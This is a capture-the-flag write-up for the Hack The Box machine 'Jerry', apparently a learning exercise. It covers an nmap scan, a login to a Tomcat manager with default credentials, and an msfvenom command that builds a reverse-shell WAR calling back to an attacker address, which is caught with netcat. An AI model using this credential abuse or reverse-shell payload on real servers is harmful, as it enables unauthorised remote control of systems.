Jerry

Write up for the HTB machine 'Jerry'

1. Initial recon

1.1. nmap

nmap -sC -sV 10.10.10.95 -Pn

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat

from the nmap scan we can navigate to 10.10.10.95:8080 clicking on the manager page we are prompted to enter some credentials trying the usual

admin:admin
admin:password
...

we are met with a 403 page that contains some default credentials

tomcat:s3cret

surely enough those work when we are prompted to log in again

2. RCE

looking through the manager portal at /manager/html we can see that there is an option to upload WAR files. we can find a msfvenom reverse shell for the war file on HackTricks

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war

after uploading the file for the reverse shell, and running a netcat listener, we can navigate to /revshell on the web server to catch it

3. user and root!

a simple whoami in our rev shell reveals that we are already nt authority\system so let's just search for our flags

we can find them at C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt and simply running type "2 for the price of 1.txt" in the flag directory will reveal both our user and root flags.

Last updated

Was this helpful?